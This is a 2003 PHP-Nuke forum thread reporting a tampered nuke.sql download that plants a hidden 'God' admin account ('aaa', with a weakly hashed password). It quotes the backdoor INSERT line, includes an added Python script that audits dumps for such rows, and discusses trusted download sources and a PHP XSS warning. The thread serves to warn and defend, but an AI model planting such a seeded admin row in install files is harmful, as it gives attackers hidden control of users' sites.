SpankedMonkey
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19
|
Posted:
Sun Jul 20, 2003 3:34 pm |
  |
I downloaded a copy of Nuke 6.8 on Monday. After installing it on my site and loading the database, I was unable to create an admin account. A very nice nukecop staff member offered to debug it and found that I had already created an account named aaa. Now this happened on 2 other databases that I loaded, and I know I didn't create an account by accident 3 times, so I checked the other DBs and found they too had a GOD account created as aaa. Now, I decided to act on a hunch and search the nuke.sql for aaa.
I found this:
Code: |
INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', ''); |
I really wish I could remember which site I got it from, but I know I didn't need to reg and I cleared my browser's cache on Wednesday, so I have nothing to track.
So all I can say is be very careful where you get your downloads and be aware that this is in circulation. |
|
|
   |
 |
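A way to run the same search before loading a downloaded nuke.sql, as an added example that is not part of the original thread or of PHP-Nuke: it flags every row an install dump inserts into a `*_authors` table and reports when the stored hash is simply the MD5 of another field in that row. The sample dump is constructed from the row quoted above; the table name `nuke_example`, the function names and the assumption that the first value is the account name are illustrative.

```python
import hashlib
import re

# Constructed sample: the row quoted in the post above plus one unrelated
# statement (the table name nuke_example is made up).
SAMPLE_DUMP = """\
INSERT INTO nuke_example VALUES ('1', 'harmless');
INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '');
"""

INSERT_RE = re.compile(
    r"INSERT\s+INTO\s+`?(\w*_authors)`?\s+VALUES\s*\((.*?)\)\s*;",
    re.IGNORECASE | re.DOTALL)
VALUE_RE = re.compile(r"'((?:[^'\\]|\\.|'')*)'|([^,\s]+)")
MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def split_values(body):
    """Split a VALUES(...) body into strings, keeping commas inside quotes."""
    out = []
    for m in VALUE_RE.finditer(body):
        quoted, bare = m.group(1), m.group(2)
        out.append(bare if quoted is None else
                   quoted.replace("''", "'").replace("\\'", "'"))
    return out


def audit_dump(sql_text, expected_accounts=()):
    """Return a finding for every seeded *_authors row not explicitly expected."""
    findings = []
    for m in INSERT_RE.finditer(sql_text):
        values = split_values(m.group(2))
        if not values or values[0] in expected_accounts:
            continue
        # Assumption: passwords are unsalted MD5 (the thread says "MD5'd").
        hashes = {v.lower() for v in values if MD5_RE.match(v)}
        # A hash that equals MD5 of another field in the same row means the
        # password is readable straight from the dump.
        weak = [v for v in values
                if hashlib.md5(v.encode()).hexdigest() in hashes]
        findings.append({"table": m.group(1), "account": values[0],
                         "fields": len(values), "password_is_field": weak})
    return findings


if __name__ == "__main__":
    for finding in audit_dump(SAMPLE_DUMP):
        print(finding)
```

Any finding in a fresh install file is worth a second look, since the admin account is normally created after the database is loaded.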
chatserv
General


Joined: Jan 12, 2003
Posts: 3128
Location: Puerto Rico
|
Posted:
Sun Jul 20, 2003 5:53 pm |
  |
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors. |
_________________ Feed a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.
ScriptHeaven | NukeResources |
|
    |
 |
Raven
General


Joined: Mar 22, 2003
Posts: 5233
Location: USA
|
Posted:
Sun Jul 20, 2003 6:03 pm |
  |
Interesting turn of events, isn't it. The question is hotly debated as to what $10 will buy you. Hmmm. |
_________________ Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff |
|
    |
 |
MikeMiles
Lieutenant


Joined: May 29, 2003
Posts: 231
|
Posted:
Mon Jul 21, 2003 1:02 am |
  |
chatserv wrote: |
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors. |
Even then you have to be on your guard. I came across one of the established Nuke sites advertising a hacker's security fix on their front page which you all caught as bogus. I had to tell them to remove it. I won't post which one it was, but I'll say many sites just don't check things out. |
|
|
   |
 |
ulissesnelson
Lieutenant


Joined: Apr 09, 2003
Posts: 188
|
Posted:
Mon Jul 21, 2003 2:50 am |
  |
I'd like, as my first job (site almost ready, waiting for mikem's answer), to get NUKE REPORT into the patrol of (unofficial) Nuke sites.
And my suggestion is: why not have the Nuke files authorized for download only from official Nuke sites
like Nuke Cops and phpnuke? We can create a standard image saying that it's a secure web site...
What do you think? |
_________________ Were You Go Today? NuKe Report ill Help you |
|
   |
 |
luchtzak
Support Mod


Joined: Mar 19, 2003
Posts: 308
|
Posted:
Mon Jul 21, 2003 2:52 am |
  |
I already had a phpnuke 6.7 version and in the sql-file they had added a link to their website so you would get:
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license
URL of that website
Be careful what you download! I think it can be easy to install something on it to track your website etc... |
_________________ Luchtzak Aviation - Snookerforum Belgium |
|
    |
 |
foxyfemfem
Support Staff


Joined: Jan 23, 2003
Posts: 668
Location: USA
|
Posted:
Mon Jul 21, 2003 3:09 am |
  |
Hello,
Quoting the Security Alert Message on the mainpage
Quote: |
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org. |
Out of curiosity I visited nukephp.org website. The website appears to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.
Did I miss something here? |
|
|
   |
 |
MikeMiles
Lieutenant


Joined: May 29, 2003
Posts: 231
|
Posted:
Mon Jul 21, 2003 3:51 am |
  |
Quote: |
Did I miss something here? |
Apparently so. The FAQ is a word-for-word rip off from the main site. Like you I don't see any link for downloading, but it could have been changed or maybe the wrong URL was posted.
Anyway, this is the registration of the site you think is legit looking. Missing a few details wouldn't you say?
WhoIs Results for nukephp.org
Contact Type Registrant
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Administrative
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Billing
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Technical
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Other Information
created-by: 5065-EN
created-date:
nameserver: dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
registrar: 5065-EN
registration-expiration-date:
status:
updated-by: 5065-EN
updated-date: |
|
|
   |
 |
Raven
General


Joined: Mar 22, 2003
Posts: 5233
Location: USA
|
Posted:
Mon Jul 21, 2003 3:59 am |
  |
foxyfemfem wrote: |
Hello,
Quoting the Security Alert Message on the mainpage
Quote: |
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org. |
Out of curiosity I visited nukephp.org website. The website appears to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.
Did I miss something here? |
You cannot download v6.8 from phpnuke.org without being a member of the Club, so he did not d/l it from there. |
_________________ Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff |
|
    |
 |
SpankedMonkey
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19
|
Posted:
Mon Jul 21, 2003 6:46 am |
  |
As I said above:
Quote: |
I really wish I could remember which site I got it from, but I know I didn't need to reg and I cleared my browser's cache on Wednesday, so I have nothing to track. |
I want to say that I did get it from a link off of nukephp.org but I can not be sure, I thought I did. The link said that it required no registration also.
When I get home from work, I will see if there is anything else I can do to see where I got the download. |
|
|
   |
 |
Zhen-Xjell
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939
|
Posted:
Mon Jul 21, 2003 6:50 am |
  |
Running analyzer will show you who the admins are of php-nuke and the phpbb2 forums. You can, as I often do, run it for a quick visual check of any changes. |
_________________ Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki] |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 4:56 pm |
  |
Where do you get the analyzer from? |
|
|
     |
 |
Zhen-Xjell
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939
|
Posted:
Tue Jul 22, 2003 5:33 pm |
  |
Hi, right on our front page. |
_________________ Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki] |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 6:46 pm |
  |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 7:46 pm |
  |
OK, I got warnings big time. I was able to fix a lot of them simply, but this is the part that I am not sure about.
I got this
-------
WARNING! WARNING! WARNING! Vulnerable PHP On Your Server!
PHP Version Reason For Vulnerability
4.3.1 Your Server may be vulnerable to Cross-site Scripting in PHP's Transparent Session ID Support. Versions prior to 4.3.2 are affected. Tell your host to read the SecurityFocus report by clicking --> here. Until that is resolved, PHP-Nuke should be the least of your worries.
AFFECTED VERSIONS: Constraints
4.3.0 and 4.3.1 with php.ini containing session.use_trans_sid=1
4.2.0 to 4.2.3 without php.ini, or with php.ini containing session.use_trans_sid=1(php.ini-dist and php.ini-recommended from the PHP source distribution had use_trans_sid=1 from 4.2.0 to 4.2.2, and use_trans_sid=0 for 4.2.3 and later versions.)
prior to 4.2.0 compiled with --enable-trans-sid and with session.use_trans_sid=1
FIXED VERSIONS: Suggestion
4.3.2 or later Backup your system and upgrade PHP, also read the article at SecurityFocus. Solution 1 from Security Focus: Click, Solution 2 from thathost: Click. Solution 1 suggests the use of mod_security, which is an Apache module discussed at Nuke Cops: Here
Does this mean that this will be resolved if I update to nuke 4.3.2?
How do I tell what version I am on? I am using PHPNuke 6.7 |
|
|
     |
 |
|